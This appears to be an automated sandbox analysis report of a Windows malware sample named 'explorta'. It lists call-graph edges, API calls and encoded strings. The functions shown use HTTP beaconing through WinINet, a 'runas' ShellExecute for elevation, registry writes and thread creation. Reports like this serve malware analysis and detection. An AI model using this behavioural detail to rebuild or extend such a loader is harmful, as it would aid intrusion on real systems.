14643->14644 14644->14641 14646 5acbc7 RtlAllocateHeap 14645->14646 14646->14647 14647->14615 14649 5ab6e3 14648->14649 14660 592800 14649->14660 14651 5ab703 std::_Throw_future_error 14652 5ab74a 14651->14652 14653 5ab753 14651->14653 14668 5ab65f 14652->14668 14654 5929e0 13 API calls 14653->14654 14656 5ab74f 14654->14656 14656->14631 14688 5aadb6 14657->14688 14659 592372 14661 5a78a0 RtlAllocateHeap 14660->14661 14662 59284f 14661->14662 14663 5925b0 RtlAllocateHeap 14662->14663 14665 592867 14663->14665 14664 59288d shared_ptr 14664->14651 14665->14664 14666 5c308c ___std_exception_copy RtlAllocateHeap 14665->14666 14667 5928e4 14666->14667 14667->14651 14669 5ac411 InitOnceExecuteOnce 14668->14669 14670 5ab677 14669->14670 14671 5ab67e 14670->14671 14674 5c649b 14670->14674 14671->14656 14673 5ab687 14673->14656 14681 5c64a7 __cftof 14674->14681 14675 5c835f __cftof 4 API calls 14676 5c64d6 14675->14676 14677 5c64e5 14676->14677 14678 5c64f3 14676->14678 14679 5c6549 12 API calls 14677->14679 14680 5c616d 5 API calls 14678->14680 14682 5c64ef 14679->14682 14683 5c650d 14680->14683 14681->14675 14682->14673 14684 5c60cd RtlAllocateHeap 14683->14684 14685 5c651a 14684->14685 14686 5c6549 12 API calls 14685->14686 14687 5c6521 ___free_lconv_mon 14685->14687 14686->14687 14687->14673 14690 5aadd1 std::_Throw_future_error 14688->14690 14689 5aae38 __cftof __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14689->14659 14690->14689 14691 5c835f __cftof 4 API calls 14690->14691 14692 5aae7f 14691->14692 14694 5937f6 14693->14694 14696 59375f 14693->14696 14694->14636 14695 59381b 14697 5a89c0 RtlAllocateHeap 14695->14697 14696->14694 14696->14695 14698 5937cd shared_ptr 14696->14698 14699 593825 14697->14699 14714 5a7530 14698->14714 14699->14636 14702 5a9a70 14701->14702 14726 5a6950 14702->14726 14704 5a9b10 14706 593740 RtlAllocateHeap 14704->14706 14705 5a9aac 14705->14704 14707 5a7530 RtlAllocateHeap 14705->14707 14708 5a9b7e shared_ptr 14706->14708 14707->14704 14709 5acbc7 RtlAllocateHeap 14708->14709 14711 5a9c9e shared_ptr 14708->14711 14710 5a9c3e 14709->14710 14734 593de0 14710->14734 14711->14639 14713 5a9c86 14713->14639 14715 5a75ab 14714->14715 14716 5a7542 14714->14716 14719 592380 RtlAllocateHeap 14715->14719 14717 5a757c 14716->14717 14718 5a754d 14716->14718 14721 5a7599 14717->14721 14723 5acbc7 RtlAllocateHeap 14717->14723 14718->14715 14720 5a7554 14718->14720 14724 5a755a 14719->14724 14722 5acbc7 RtlAllocateHeap 14720->14722 14721->14694 14722->14724 14725 5a7586 14723->14725 14724->14694 14725->14694 14727 5a6991 14726->14727 14728 5acbc7 RtlAllocateHeap 14727->14728 14729 5a69b8 14728->14729 14730 5a6bc6 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14729->14730 14731 5acbc7 RtlAllocateHeap 14729->14731 14730->14705 14732 5a6b3b __cftof __Mtx_init_in_situ 14731->14732 14740 592dc0 14732->14740 14735 593e1e 14734->14735 14737 593e48 14734->14737 14735->14713 14736 593e58 14736->14713 14737->14736 14785 592b00 14737->14785 14741 592e6f 14740->14741 14742 592e06 14740->14742 14748 592eef 14741->14748 14753 5abe8c GetSystemTimePreciseAsFileTime 14741->14753 14743 5abe8c GetSystemTimePreciseAsFileTime 14742->14743 14744 592e12 14743->14744 14745 592e1d 14744->14745 14746 592f1e 14744->14746 14750 5acbc7 RtlAllocateHeap 14745->14750 14752 592e30 __Mtx_unlock 14745->14752 14747 5aba4a 13 API calls 14746->14747 14749 592f24 14747->14749 14748->14730 14751 5aba4a 13 API calls 14749->14751 14750->14752 14754 592eb9 14751->14754 14752->14741 14752->14749 14753->14754 14755 5aba4a 13 API calls 14754->14755 14756 592ec0 __Mtx_unlock 14754->14756 14755->14756 14757 5aba4a 13 API calls 14756->14757 14758 592ed8 __Cnd_broadcast 14756->14758 14757->14758 14758->14748 14759 5aba4a 13 API calls 14758->14759 14760 592f3c 14759->14760 14761 5abe8c GetSystemTimePreciseAsFileTime 14760->14761 14771 592f80 shared_ptr __Mtx_unlock 14761->14771 14762 5930c5 14763 5aba4a 13 API calls 14762->14763 14764 5930cb 14763->14764 14765 5aba4a 13 API calls 14764->14765 14766 5930d1 14765->14766 14767 5aba4a 13 API calls 14766->14767 14773 593093 __Mtx_unlock 14767->14773 14768 5930a7 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14768->14730 14769 5aba4a 13 API calls 14770 5930dd 14769->14770 14771->14762 14771->14764 14771->14768 14772 5abe8c GetSystemTimePreciseAsFileTime 14771->14772 14774 59305f 14772->14774 14773->14768 14773->14769 14774->14762 14774->14766 14774->14773 14776 5ab52c 14774->14776 14779 5ab352 14776->14779 14778 5ab53c 14778->14774 14780 5ab37c 14779->14780 14781 5ac74b _xtime_get GetSystemTimePreciseAsFileTime 14780->14781 14784 5ab384 __Xtime_diff_to_millis2 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14780->14784 14782 5ab3af __Xtime_diff_to_millis2 14781->14782 14783 5ac74b _xtime_get GetSystemTimePreciseAsFileTime 14782->14783 14782->14784 14783->14784 14784->14778 14786 5acbc7 RtlAllocateHeap 14785->14786 14787 592b0e 14786->14787 14795 5ab027 14787->14795 14789 592b42 14790 592b49 14789->14790 14801 592b80 14789->14801 14790->14713 14792 592b58 14804 592460 14792->14804 14794 592b65 std::_Throw_future_error 14796 5ab034 14795->14796 14800 5ab053 Concurrency::details::_Reschedule_chore 14795->14800 14807 5ac357 14796->14807 14798 5ab044 14798->14800 14809 5aaffe 14798->14809 14800->14789 14815 5aafdb 14801->14815 14803 592bb2 shared_ptr 14803->14792 14805 5c308c ___std_exception_copy RtlAllocateHeap 14804->14805 14806 592497 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 14805->14806 14806->14794 14808 5ac372 CreateThreadpoolWork 14807->14808 14808->14798 14810 5ab007 Concurrency::details::_Reschedule_chore 14809->14810 14813 5ac5ac 14810->14813 14812 5ab021 14812->14800 14814 5ac5c1 TpPostWork 14813->14814 14814->14812 14816 5aaff7 14815->14816 14817 5aafe7 14815->14817 14816->14803 14817->14816 14819 5ac258 14817->14819 14820 5ac26d TpReleaseWork 14819->14820 14820->14816 14822 5921e0 std::invalid_argument::invalid_argument RtlAllocateHeap 14821->14822 14823 5ab57f 14822->14823 14823->14624 13492 5c6224 13493 5c623c 13492->13493 13494 5c6232 13492->13494 13495 5c616d 5 API calls 13493->13495 13496 5c6256 13495->13496 13497 5c60cd RtlAllocateHeap 13496->13497 13498 5c6263 ___free_lconv_mon 13497->13498 13249 596020 RegOpenKeyExA 13250 59605d RegSetValueExA 13249->13250 13251 596087 shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13249->13251 13250->13251 13514 59d8e0 recv 13515 59d942 recv 13514->13515 13516 59d977 recv 13515->13516 13518 59d9b1 13516->13518 13517 59dad3 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13518->13517 13523 5abe8c 13518->13523 13530 5abc32 13523->13530 13525 59db0e 13526 5aba4a 13525->13526 13527 5aba72 13526->13527 13528 5aba54 13526->13528 13527->13527 13528->13527 13547 5aba77 13528->13547 13531 5abc88 13530->13531 13533 5abc5a __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13530->13533 13531->13533 13536 5ac74b 13531->13536 13533->13525 13534 5abcdd __Xtime_diff_to_millis2 13534->13533 13535 5ac74b _xtime_get GetSystemTimePreciseAsFileTime 13534->13535 13535->13534 13537 5ac75a 13536->13537 13539 5ac767 __aulldvrm 13536->13539 13537->13539 13540 5ac724 13537->13540 13539->13534 13543 5ac3ca 13540->13543 13544 5ac3db GetSystemTimePreciseAsFileTime 13543->13544 13545 5ac3e7 13543->13545 13544->13545 13545->13539 13552 5929e0 13547->13552 13549 5aba8e 13568 5ab9df 13549->13568 13551 5aba9f std::_Throw_future_error 13551->13528 13574 5ab6bf 13552->13574 13554 5929ff 13554->13549 13555 5929f4 __cftof 13555->13554 13556 5c835f __cftof 4 API calls 13555->13556 13557 5c64d6 13556->13557 13558 5c64e5 13557->13558 13559 5c64f3 13557->13559 13560 5c6549 12 API calls 13558->13560 13561 5c616d 5 API calls 13559->13561 13562 5c64ef 13560->13562 13563 5c650d 13561->13563 13562->13549 13564 5c60cd RtlAllocateHeap 13563->13564 13565 5c651a 13564->13565 13566 5c6549 12 API calls 13565->13566 13567 5c6521 ___free_lconv_mon 13565->13567 13566->13567 13567->13549 13569 5ab9eb __EH_prolog3_GS 13568->13569 13570 5a78a0 RtlAllocateHeap 13569->13570 13571 5aba1d 13570->13571 13581 5925b0 13571->13581 13573 5aba32 13573->13551 13577 5ac411 13574->13577 13578 5ac41f InitOnceExecuteOnce 13577->13578 13580 5ab6d2 13577->13580 13578->13580 13580->13555 13582 5a71e0 RtlAllocateHeap 13581->13582 13583 592602 13582->13583 13584 592625 13583->13584 13585 5a8720 RtlAllocateHeap 13583->13585 13586 5a8720 RtlAllocateHeap 13584->13586 13588 59268e shared_ptr 13584->13588 13585->13584 13586->13588 13587 5c308c ___std_exception_copy RtlAllocateHeap 13589 59274b shared_ptr __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ ___std_exception_destroy 13587->13589 13588->13587 13588->13589 13589->13573 13902 59dd20 13903 59dd45 13902->13903 13905 59dd29 13902->13905 13905->13903 13906 59db80 13905->13906 13907 59db90 __dosmaperr 13906->13907 13914 5c8229 13907->13914 13915 5c8244 13914->13915 13921 5c7f87 13915->13921 13917 59dbcd 13918 5ab979 13917->13918 13943 5ab8c9 13918->13943 13920 5ab98a std::_Throw_future_error 13922 5c7f99 13921->13922 13923 5c60ea __cftof 5 API calls 13922->13923 13926 5c7fae __dosmaperr ___std_exception_copy 13922->13926 13925 5c7fde 13923->13925 13925->13926 13927 5c81d5 13925->13927 13926->13917 13928 5c8212 13927->13928 13931 5c81e2 13927->13931 13929 5ccb99 4 API calls 13928->13929 13930 5c81f1 __fassign 13929->13930 13930->13925 13931->13930 13933 5ccbbd 13931->13933 13934 5c60ea __cftof 5 API calls 13933->13934 13936 5ccbda 13934->13936 13935 5ccbea __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13935->13930 13936->13935 13938 5ce930 13936->13938 13939 5c60ea __cftof 5 API calls 13938->13939 13940 5ce950 __fassign 13939->13940 13941 5ce9a3 __cftof __fassign __freea __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 13940->13941 13942 5ca7bb __cftof RtlAllocateHeap 13940->13942 13941->13935 13942->13941 13944 5921e0 std::invalid_argument::invalid_argument RtlAllocateHeap 13943->13944 13945 5ab8db 13944->13945 13945->13920 14584 59a9e0 14585 59aa32 14584->14585 14586 5a78a0 RtlAllocateHeap 14585->14586 14587 59aa73 14586->14587 14588 5a7cf0 RtlAllocateHeap 14587->14588 14589 59aab5 14588->14589 14590 5a7cf0 RtlAllocateHeap 14589->14590 14591 59aaf6 14590->14591 14592 5a71e0 RtlAllocateHeap 14591->14592 14593 59ab1d 14592->14593 14594 5a7cf0 RtlAllocateHeap 14593->14594 14595 59ab5f 14594->14595 14596 5a7cf0 RtlAllocateHeap 14595->14596 14597 59aba6 14596->14597 14598 5a7cf0 RtlAllocateHeap 14597->14598 14599 59abed 14598->14599 14828 5a7ba0 14829 5a6f40 RtlAllocateHeap 14828->14829 14830 5a7c19 14829->14830 14831 5a8720 RtlAllocateHeap 14830->14831 14832 5a7c34 14830->14832 14831->14832 14833 5a8720 RtlAllocateHeap 14832->14833 14834 5a7c88 14832->14834 14835 5a7cce 14833->14835

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 0059B670 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310networkfileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 767 59b670-59b6bc 768 59bab1-59bad6 call 5a78a0 767->768 769 59b6c2-59b6c6 767->769 774 59bad8-59bae4 768->774 775 59bb04-59bb1c 768->775 769->768 771 59b6cc-59b6d0 769->771 771->768 773 59b6d6-59b75f InternetOpenW InternetConnectA call 5a71e0 call 595d40 771->773 802 59b761 773->802 803 59b763-59b77f HttpOpenRequestA 773->803 777 59bafa-59bb01 call 5ace48 774->777 778 59bae6-59baf4 774->778 779 59ba68-59ba80 775->779 780 59bb22-59bb2e 775->780 777->775 778->777 782 59bb7f-59bb84 call 5c644a 778->782 786 59bb53-59bb6f call 5ac7d1 779->786 787 59ba86-59ba92 779->787 784 59ba5e-59ba65 call 5ace48 780->784 785 59bb34-59bb42 780->785 784->779 785->782 792 59bb44 785->792 793 59bb49-59bb50 call 5ace48 787->793 794 59ba98-59baa6 787->794 792->784 793->786 794->782 801 59baac 794->801 801->793 802->803 804 59b781-59b790 803->804 805 59b7b0-59b81f call 5a71e0 call 595d40 call 5a71e0 call 595d40 803->805 807 59b792-59b7a0 804->807 808 59b7a6-59b7ad call 5ace48 804->808 819 59b821 805->819 820 59b823-59b839 HttpSendRequestA 805->820 807->808 808->805 819->820 821 59b83b-59b84a 820->821 822 59b86a-59b892 820->822 823 59b84c-59b85a 821->823 824 59b860-59b867 call 5ace48 821->824 825 59b8c3-59b8e4 InternetReadFile 822->825 826 59b894-59b8a3 822->826 823->824 824->822 830 59b8ea 825->830 828 59b8b9-59b8c0 call 5ace48 826->828 829 59b8a5-59b8b3 826->829 828->825 829->828 833 59b8f0-59b9a0 call 5c3a30 830->833
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • InternetOpenW.WININET(005E8D34,00000000,00000000,00000000,00000000), ref: 0059B6FD
                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0059B721
                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 0059B76A
                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,00000000), ref: 0059B82B
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 0059B8DC
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0059B9B7
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0059B9BF
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 0059B9C7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                                                                                                                                                                                                                          • String ID: WA9QQy==$WiVq$cDRX8BqpMw==$cDRX8FO0MyY=$invalid stoi argument$stoi argument out of range$3_
                                                                                                                                                                                                                                          • API String ID: 688256393-2154739448
                                                                                                                                                                                                                                          • Opcode ID: a3a52a4a38f206cdaf49bcb1792af6e034f650a7aa6c0f190c7b67003a6ae139
                                                                                                                                                                                                                                          • Instruction ID: 272506125af6c1b7d487c11d218c5c7242aabba59c0f67b98a2751642de32a94
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3a52a4a38f206cdaf49bcb1792af6e034f650a7aa6c0f190c7b67003a6ae139
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4B1B0B1A101189BFF25CF28CD89BADBFA9FB85304F5041A8E508972D2D7759AC0CB95
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 00596E30 Relevance: 14.6, APIs: 4, Strings: 4, Instructions: 576sleepthreadCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 882 596e30-596ed8 call 5a8c50 call 5a78a0 ShellExecuteA 887 596eda-596ee6 882->887 888 596f06-596f1e 882->888 889 596ee8-596ef6 887->889 890 596efc-596f03 call 5ace48 887->890 891 596f48-596f60 888->891 892 596f20-596f2c 888->892 889->890 897 596f9c-59705b call 5c644a call 5a71e0 * 6 call 596e30 889->897 890->888 895 596f8a-596f9b 891->895 896 596f62-596f6e 891->896 893 596f3e-596f45 call 5ace48 892->893 894 596f2e-596f3c 892->894 893->891 894->893 894->897 900 596f80-596f87 call 5ace48 896->900 901 596f70-596f7e 896->901 923 597089-59708f 897->923 924 59705d-597069 897->924 900->895 901->897 901->900 925 5970b9-5970bf 923->925 926 597091-59709d 923->926 927 59706b-597079 924->927 928 59707f-597086 call 5ace48 924->928 932 5970e9-597104 call 5ac7d1 925->932 933 5970c1-5970cd 925->933 930 5970af-5970b6 call 5ace48 926->930 931 59709f-5970ad 926->931 927->928 934 597107-597161 call 5c644a Sleep 927->934 928->923 930->925 931->930 931->934 938 5970df-5970e6 call 5ace48 933->938 939 5970cf-5970dd 933->939 945 5971e1-597257 call 5a78a0 * 3 CreateThread Sleep 934->945 946 597163-597177 call 5ac8f6 934->946 938->932 939->934 939->938 960 597259-597265 945->960 961 597285-59729d 945->961 946->945 952 597179-5971de call 5ace33 call 5ac8ac 946->952 952->945 963 59727b-597282 call 5ace48 960->963 964 597267-597275 960->964 965 59729f-5972ab 961->965 966 5972c7-5972df 961->966 963->961 964->963 967 59731b-597390 call 5c644a call 5a7e60 call 5a7b00 964->967 969 5972bd-5972c4 call 5ace48 965->969 970 5972ad-5972bb 965->970 971 597309-59731a 966->971 972 5972e1-5972ed 966->972 986 5973be-59743d call 5a71e0 * 2 call 595d40 call 5a78a0 call 596e30 967->986 987 597392-59739e 967->987 969->966 970->967 970->969 973 5972ff-597306 call 5ace48 972->973 974 5972ef-5972fd 972->974 973->971 974->967 974->973 1007 59746b-597471 986->1007 1008 59743f-59744b 986->1008 989 5973a0-5973ae 987->989 990 5973b4-5973bb call 5ace48 987->990 989->990 992 5974fa call 5c644a 989->992 990->986 997 5974ff-597504 call 5c644a 992->997 1009 59749b-5974b3 1007->1009 1010 597473-59747f 1007->1010 1011 59744d-59745b 1008->1011 1012 597461-597468 call 5ace48 1008->1012 1015 5974dd-5974f9 call 5ac7d1 1009->1015 1016 5974b5-5974c1 1009->1016 1013 597491-597498 call 5ace48 1010->1013 1014 597481-59748f 1010->1014 1011->997 1011->1012 1012->1007 1013->1009 1014->997 1014->1013 1020 5974d3-5974da call 5ace48 1016->1020 1021 5974c3-5974d1 1016->1021 1020->1015 1021->997 1021->1020
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ShellExecuteA.SHELL32(00000000,0059704D,?,?,00000000,00000000), ref: 00596EC4
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000064,031683DB,?,00000000,005D9148,000000FF), ref: 0059714C
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,00596FB0,005F6530,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0059723E
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00597249
                                                                                                                                                                                                                                            • Part of subcall function 005AC8AC: RtlWakeAllConditionVariable.NTDLL ref: 005AC960
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Sleep$ConditionCreateExecuteShellThreadVariableWake
                                                                                                                                                                                                                                          • String ID: 0e_$He_$`e_$runas
                                                                                                                                                                                                                                          • API String ID: 2515422543-3804989215
                                                                                                                                                                                                                                          • Opcode ID: 29561497a8ef3d85b4a56c669c214e3071550b239430facf097ea20f40210829
                                                                                                                                                                                                                                          • Instruction ID: 7236587944737f48256cce76d1b4c8e0b1436c261d3ebed74a5b925db96b5086
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 29561497a8ef3d85b4a56c669c214e3071550b239430facf097ea20f40210829
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C124771610149AFEF08DF28CD89BAD7FA6FB89300F508259F815973C6D7399A84CB91
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005ACBC7 Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ___std_exception_copy.LIBVCRUNTIME ref: 005923BE
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000868000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.000000000089F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000008AD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252240373.00000000008AE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252661113.0000000000A4D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3252828926.0000000000A4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_590000_explorta.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ___std_exception_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2659868963-0
                                                                                                                                                                                                                                          • Opcode ID: 8fb62e32edcc8086592c849198255e0232590fce5e1a9690e27415f277442847
                                                                                                                                                                                                                                          • Instruction ID: ea5fd401e3753538db96243e9ed32cfb4c0025aa18d5137779e9b9920fa648ad
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fb62e32edcc8086592c849198255e0232590fce5e1a9690e27415f277442847
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F51EFB1900609DFDB19DF58D8857BEBBF4FB58310F24842AD506EB290E778A944CF60
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          Function 005A3F30 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2517COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3250378397.0000000000591000.00000040.00000001.01000000.00000007.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250324411.0000000000590000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250378397.00000000005F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250721245.00000000005F7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.00000000005F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3250812316.0000000000791000.00000040.00000001.01000000.00000007.sdmpDownload File
